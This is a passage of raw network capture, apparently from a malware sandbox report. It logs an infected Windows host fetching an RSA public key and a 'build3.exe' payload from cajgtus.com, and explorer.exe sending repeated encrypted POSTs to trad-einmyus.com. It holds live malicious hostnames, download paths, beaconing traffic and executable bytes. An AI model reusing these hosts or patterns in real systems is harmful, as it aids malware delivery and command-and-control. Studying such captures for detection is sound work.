18	192.168.2.4	49757	213.172.74.157	80	5436	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:43.458281994 CEST	128	OUT	GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
May 25, 2024 21:29:44.396945000 CEST	761	IN	HTTP/1.1 200 OK Date: Sat, 25 May 2024 19:29:57 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 75 35 31 66 77 6e 51 79 38 55 75 2b 73 49 4a 6e 73 66 38 42 5c 5c 6e 66 53 69 7a 31 61 75 68 5a 74 4c 39 39 6a 48 62 75 64 32 37 79 42 32 34 78 54 58 6a 52 78 6e 46 5c 2f 71 55 44 6a 74 50 75 4d 7a 71 52 39 63 6e 6b 34 46 4d 34 62 44 37 33 77 51 52 72 64 52 46 68 5c 5c 6e 53 45 35 57 6b 31 31 76 74 6b 53 50 70 34 7a 43 4e 6e 58 37 69 4f 42 47 78 52 71 36 54 52 58 41 33 72 58 6c 4d 2b 50 75 6f 52 5a 4a 76 6f 53 6d 31 67 38 39 63 56 6e 6d 70 38 75 75 55 5a 67 4d 5c 5c 6e 30 45 74 6c 55 6b 62 48 57 4b 46 6b 72 33 4c 4e 47 5a 6c 33 33 68 55 6d 76 46 69 77 30 43 51 52 71 2b 54 34 44 49 7a 39 64 6e 4b 46 6f 53 43 4f 44 43 4f 41 59 4c 34 65 66 62 59 47 5a 69 6c 37 5c 5c 6e 63 33 5c 2f 48 7a 35 43 46 45 2b 66 65 56 54 [TRUNCATED] Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49759	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:44.284933090 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mxmwgpprwcpwxem.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: trad-einmyus.com
May 25, 2024 21:29:44.284933090 CEST	136	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 2e 81 b2 27 Data Ascii: ?v1y5eCDhTz\Fu$f]d.'EoluRK^i)+rDw#Eg*PMF]d'nXZu
May 25, 2024 21:29:45.030427933 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49760	213.172.74.157	80	2764	C:\Users\user\AppData\Local\Temp\E609.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:44.285365105 CEST	96	OUT	GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
May 25, 2024 21:29:45.290709972 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 25 May 2024 19:29:58 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT ETag: "4ae00-6074de5a4a562" Accept-Ranges: bytes Content-Length: 306688 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6krh8rh8rh88sh8l8nh8l8h8U_8{h8ri8h8l82h8l8sh8l8sh8Richrh8PELaj; @>lhd>/0@.textrhj `.data:n@.kic>\|@.rsrc/>0~@@
May 25, 2024 21:29:45.292639971 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 73 03 00 00 00 00 00 8c 73 03 00 9c 73 03 00 Data Ascii: ssskl"l.lHlZlpllllllllm m4mBm^mtmmmmmmmnn&n@n\nlnnnnnnnn
May 25, 2024 21:29:45.302105904 CEST	448	IN	Data Raw: 61 00 66 00 61 00 63 00 61 00 00 00 00 00 6a 6f 78 65 63 65 00 00 73 75 76 75 73 75 6e 69 78 61 6e 6f 66 75 6c 6f 78 75 63 65 70 6f 66 61 6c 69 6d 65 74 6f 6d 69 6e 69 62 69 64 6f 00 00 6c 00 75 00 7a 00 6f 00 67 00 75 00 64 00 61 00 77 00 75 00 Data Ascii: afacajoxecesuvusunixanofuloxucepofalimetominibidoluzogudawulapabevotuwSolofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaM
May 25, 2024 21:29:45.446660042 CEST	1236	IN	Data Raw: 32 00 2e 00 64 00 6c 00 6c 00 00 00 00 00 ec b8 40 00 a7 bb 40 00 d0 e7 40 00 49 00 54 00 45 00 52 00 41 00 54 00 4f 00 52 00 20 00 4c 00 49 00 53 00 54 00 20 00 43 00 4f 00 52 00 52 00 55 00 50 00 54 00 45 00 44 00 21 00 00 00 00 00 43 00 3a 00 Data Ascii: 2.dll@@@ITERATOR LIST CORRUPTED!C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xutility"out of ran
May 25, 2024 21:29:45.448729038 CEST	224	IN	Data Raw: 72 00 00 00 00 00 00 00 00 00 73 00 74 00 64 00 3a 00 3a 00 5f 00 56 00 65 00 63 00 74 00 6f 00 72 00 5f 00 63 00 6f 00 6e 00 73 00 74 00 5f 00 69 00 74 00 65 00 72 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 Data Ascii: rstd::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator
May 25, 2024 21:29:45.453568935 CEST	1236	IN	Data Raw: 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 Data Ascii: <char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >:
May 25, 2024 21:29:45.453604937 CEST	224	IN	Data Raw: 20 00 30 00 29 00 00 00 00 00 6c b9 40 00 ef d2 40 00 e7 d2 40 00 43 00 3a 00 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 20 00 28 00 78 00 38 00 36 00 29 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 Data Ascii: 0)l@@@C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xstring@!@@vector<T> too longC:\Program Fi
May 25, 2024 21:29:45.458331108 CEST	1236	IN	Data Raw: 6c 00 65 00 73 00 20 00 28 00 78 00 38 00 36 00 29 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 53 00 74 00 75 00 64 00 69 00 6f 00 20 00 39 00 2e 00 30 00 5c 00 56 00 43 00 5c 00 Data Ascii: les (x86)\Microsoft Visual Studio 9.0\VC\include\memoryvector erase iterator outside rangevector insert iterator outs
May 25, 2024 21:29:45.458364010 CEST	224	IN	Data Raw: 6e 00 67 00 20 00 74 00 6f 00 6f 00 20 00 6c 00 6f 00 6e 00 67 00 20 00 6f 00 72 00 20 00 49 00 4f 00 20 00 45 00 72 00 72 00 6f 00 72 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00 Data Ascii: ng too long or IO Errorwcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")(*_errno())
May 25, 2024 21:29:45.500643969 CEST	224	IN	Data Raw: 6e 00 67 00 20 00 74 00 6f 00 6f 00 20 00 6c 00 6f 00 6e 00 67 00 20 00 6f 00 72 00 20 00 49 00 4f 00 20 00 45 00 72 00 72 00 6f 00 72 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00 Data Ascii: ng too long or IO Errorwcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")(*_errno())
May 25, 2024 21:29:45.603466034 CEST	1236	IN	Data Raw: 00 00 44 00 65 00 62 00 75 00 67 00 20 00 25 00 73 00 21 00 0a 00 0a 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 3a 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 Data Ascii: Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)Module: File: Line: Expre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49761	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:45.087893009 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bglvkirrchdcy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: trad-einmyus.com
May 25, 2024 21:29:45.087918997 CEST	353	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 23 c7 ad 7d Data Ascii: ?v1y5eCDhTz\Fu$f]d#}F}u7c)-#4jwFc0;F/>(q\+~JtA=kKO9Y@b$yEd:w~YmFC^?LN5^^:b+<%9
May 25, 2024 21:29:45.813000917 CEST	262	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49763	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:45.888232946 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://syppprqoaeoyrm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 208 Host: trad-einmyus.com
May 25, 2024 21:29:45.888266087 CEST	208	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 93 66 5d 02 c9 a1 c1 64 26 9c ca 69 Data Ascii: ?v1y5eCDhTz\Fu$f]d&i#~pJap_!45oD:G}!`1NLp"<6u_QY^mxKOU$@gs,j0y{]U]ANIj
May 25, 2024 21:29:46.608958960 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49764	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:46.731628895 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://syrimjyxlgxo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: trad-einmyus.com
May 25, 2024 21:29:46.731661081 CEST	135	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 15 d6 dd 00 Data Ascii: ?v1y5eCDhTz\Fu$f]d\y0AGJLOP3wn&@-`*?a}O:
May 25, 2024 21:29:47.462054014 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:47 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49766	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:47.693104982 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://doewnlgtcbtsgiu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 162 Host: trad-einmyus.com
May 25, 2024 21:29:47.693207979 CEST	162	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 43 a0 c9 76 Data Ascii: ?v1y5eCDhTz\Fu$f]dCv4welg-^#5@<n}S53i.$r4jLEa\|\E#A@B<Q]_l
May 25, 2024 21:29:48.414397955 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49767	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:49.866228104 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uetjtbokcendpi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 348 Host: trad-einmyus.com
May 25, 2024 21:29:49.866278887 CEST	348	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 03 c0 b6 6a Data Ascii: ?v1y5eCDhTz\Fu$f]dj"qz;vtrW>mvOB65/:2yF 5es;,,19V%;%aR>P)-d(,}7>5#JJS4ZdAOtG_x/(%guZ
May 25, 2024 21:29:50.749275923 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49769	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:50.854255915 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://obuibmhfpgvomgod.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: trad-einmyus.com
May 25, 2024 21:29:50.854255915 CEST	234	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8f 66 5d 02 c8 a1 c1 64 19 93 cf 30 Data Ascii: ?v1y5eCDhTz\Fu$f]d0_\|5N5S?jwK/yw96!Ds!&}#(\|De2 F{S^^pt%R{3>{]#G^=3%~}gFoI.bbj1
May 25, 2024 21:29:51.689519882 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49770	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:51.704930067 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ukrvqlmerplrex.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: trad-einmyus.com
May 25, 2024 21:29:51.704977989 CEST	350	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 26 d2 8b 1d Data Ascii: ?v1y5eCDhTz\Fu$f]d&67aP^bo)MrZD73FEV>{k})VUVJc[[4\|&K0F*y@\zQG[zw+0f1}< liA
May 25, 2024 21:29:52.445130110 CEST	233	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49774	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:54.574933052 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tldcvhhvnmxh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 125 Host: trad-einmyus.com
May 25, 2024 21:29:54.574954033 CEST	125	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8d 66 5d 02 c8 a1 c1 64 15 af d4 68 Data Ascii: ?v1y5eCDhTz\Fu$f]dh@Dp6A/4E`#ekU=)/
May 25, 2024 21:29:55.299410105 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 